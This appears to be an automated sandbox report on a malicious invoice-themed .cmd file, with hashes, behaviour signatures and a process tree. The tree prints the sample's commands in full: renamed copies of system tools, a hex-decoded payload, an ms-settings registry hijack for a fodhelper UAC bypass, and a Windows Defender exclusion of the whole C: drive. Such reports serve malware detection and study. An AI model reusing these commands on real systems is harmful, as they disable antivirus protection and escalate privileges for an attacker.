Analysis
-
max time kernel
142s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07-06-2024 05:19
Static task
static1
Behavioral task
behavioral1
Sample
INV200495000-PAY ORDER0940584.cmd
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
INV200495000-PAY ORDER0940584.cmd
Resource
win10v2004-20240508-en
General
-
Target
INV200495000-PAY ORDER0940584.cmd
-
Size
3.0MB
-
MD5
ba6011bbbcee0c141db0c45b8219a275
-
SHA1
e8fe383f4b6614b70fe9902618660aad3199bb62
-
SHA256
a7d331358f0530d1b5780f18ded9587256f16a675b1f440ebb73c92979d9719b
-
SHA512
3b1145ff9512fc0d7e3dcbae431cd3424e12721c17a4be043ca2b4ddd7ab4db5f9670ea07e75eedfad8d928b9fe08ca2412d062375b1df25e9ed31aa25fdfadf
-
SSDEEP
49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4Kh:7
Malware Config
Signatures
-
Executes dropped EXE 24 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 1800 alpha.exe 2216 alpha.exe 1764 alpha.exe 2004 alpha.exe 2636 kn.exe 2716 alpha.exe 2540 alpha.exe 2596 alpha.exe 2624 alpha.exe 3036 xkn.exe 2960 alpha.exe 3012 ger.exe 1768 alpha.exe 2796 kn.exe 2828 alpha.exe 2032 Ping_c.pif 336 alpha.exe 784 alpha.exe 780 alpha.exe 888 alpha.exe 2420 alpha.exe 2708 alpha.exe 2020 alpha.exe 1092 alpha.exe -
Loads dropped DLL 15 IoCs
Processes:
cmd.exealpha.exealpha.exexkn.exealpha.exeWerFault.exepid process 3028 cmd.exe 3028 cmd.exe 3028 cmd.exe 3028 cmd.exe 2004 alpha.exe 3028 cmd.exe 3028 cmd.exe 3028 cmd.exe 3028 cmd.exe 2624 alpha.exe 3036 xkn.exe 3036 xkn.exe 2960 alpha.exe 1240 WerFault.exe 1240 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1240 2032 WerFault.exe Ping_c.pif -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2948 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\ms-settings ger.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
Ping_c.pifpid process 2032 Ping_c.pif -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
xkn.exepid process 3036 xkn.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3036 xkn.exe Token: SeDebugPrivilege 2948 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 3028 wrote to memory of 2516 3028 cmd.exe extrac32.exe PID 3028 wrote to memory of 2516 3028 cmd.exe extrac32.exe PID 3028 wrote to memory of 2516 3028 cmd.exe extrac32.exe PID 3028 wrote to memory of 1800 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1800 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1800 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2216 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2216 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2216 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1764 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1764 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1764 3028 cmd.exe alpha.exe PID 1764 wrote to memory of 2052 1764 alpha.exe extrac32.exe PID 1764 wrote to memory of 2052 1764 alpha.exe extrac32.exe PID 1764 wrote to memory of 2052 1764 alpha.exe extrac32.exe PID 3028 wrote to memory of 2004 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2004 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2004 3028 cmd.exe alpha.exe PID 2004 wrote to memory of 2636 2004 alpha.exe kn.exe PID 2004 wrote to memory of 2636 2004 alpha.exe kn.exe PID 2004 wrote to memory of 2636 2004 alpha.exe kn.exe PID 3028 wrote to memory of 2716 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2716 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2716 3028 cmd.exe alpha.exe PID 2716 wrote to memory of 2592 2716 alpha.exe extrac32.exe PID 2716 wrote to memory of 2592 2716 alpha.exe extrac32.exe PID 2716 wrote to memory of 2592 2716 alpha.exe extrac32.exe PID 3028 wrote to memory of 2540 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2540 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2540 3028 cmd.exe alpha.exe PID 2540 wrote to memory of 2272 2540 alpha.exe extrac32.exe PID 2540 wrote to memory of 2272 2540 alpha.exe extrac32.exe PID 2540 wrote to memory of 2272 2540 alpha.exe extrac32.exe PID 3028 wrote to memory of 2596 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2596 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2596 3028 cmd.exe alpha.exe PID 2596 wrote to memory of 2236 2596 alpha.exe extrac32.exe PID 2596 wrote to memory of 2236 2596 alpha.exe extrac32.exe PID 2596 wrote to memory of 2236 2596 alpha.exe extrac32.exe PID 3028 wrote to memory of 2624 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2624 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2624 3028 cmd.exe alpha.exe PID 2624 wrote to memory of 3036 2624 alpha.exe xkn.exe PID 2624 wrote to memory of 3036 2624 alpha.exe xkn.exe PID 2624 wrote to memory of 3036 2624 alpha.exe xkn.exe PID 3036 wrote to memory of 2960 3036 xkn.exe alpha.exe PID 3036 wrote to memory of 2960 3036 xkn.exe alpha.exe PID 3036 wrote to memory of 2960 3036 xkn.exe alpha.exe PID 2960 wrote to memory of 3012 2960 alpha.exe ger.exe PID 2960 wrote to memory of 3012 2960 alpha.exe ger.exe PID 2960 wrote to memory of 3012 2960 alpha.exe ger.exe PID 3028 wrote to memory of 1768 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1768 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 1768 3028 cmd.exe alpha.exe PID 1768 wrote to memory of 2796 1768 alpha.exe kn.exe PID 1768 wrote to memory of 2796 1768 alpha.exe kn.exe PID 1768 wrote to memory of 2796 1768 alpha.exe kn.exe PID 3028 wrote to memory of 2828 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2828 3028 cmd.exe alpha.exe PID 3028 wrote to memory of 2828 3028 cmd.exe alpha.exe PID 2828 wrote to memory of 2948 2828 alpha.exe taskkill.exe PID 2828 wrote to memory of 2948 2828 alpha.exe taskkill.exe PID 2828 wrote to memory of 2948 2828 alpha.exe taskkill.exe PID 3028 wrote to memory of 2032 3028 cmd.exe Ping_c.pif
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 6923⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.1MB
MD5cf0406a9f208a43a3a3eccf1769f55d5
SHA17a8d7bde7f7ffacbda4847f354d62e311312f071
SHA2568bd6792495e882b3f5604fc9cf7fdc1357d38c5297593951bb26aa9309765df8
SHA512ae35345f9a0d00de0f147056ad8f8c700eca6860ac869c28f6b71ef70f71bee96f8efeb5e2d7d8a75eee2aafeac34124ff5acc947c608478ee478332d9130b00
-
C:\Users\Public\Ping_c.mp4Filesize
2.2MB
MD5d7e89c5831e8bcb061122aa646bf5815
SHA1d98375cc44cdb2662fafc4db36674833347a7ef7
SHA256f6ed12b8c9298e89a282c473e2022c477116da4aee339e27569eb15368bf2076
SHA512b497f8971be6958f0868d9c9ea68ade02e1ff18506360af5eda2ba87ac32a510fdb7dfd41701b1d894ec5901232fc3abe74ab2ff5fb0ba821936dde1b6914054
-
C:\Users\Public\ger.exeFilesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
C:\Users\Public\kn.exeFilesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
\Users\Public\alpha.exeFilesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
\Users\Public\xkn.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/2032-71-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB
-
memory/3036-43-0x000000001B420000-0x000000001B702000-memory.dmpFilesize
2.9MB
-
memory/3036-44-0x0000000001EA0000-0x0000000001EA8000-memory.dmpFilesize
32KB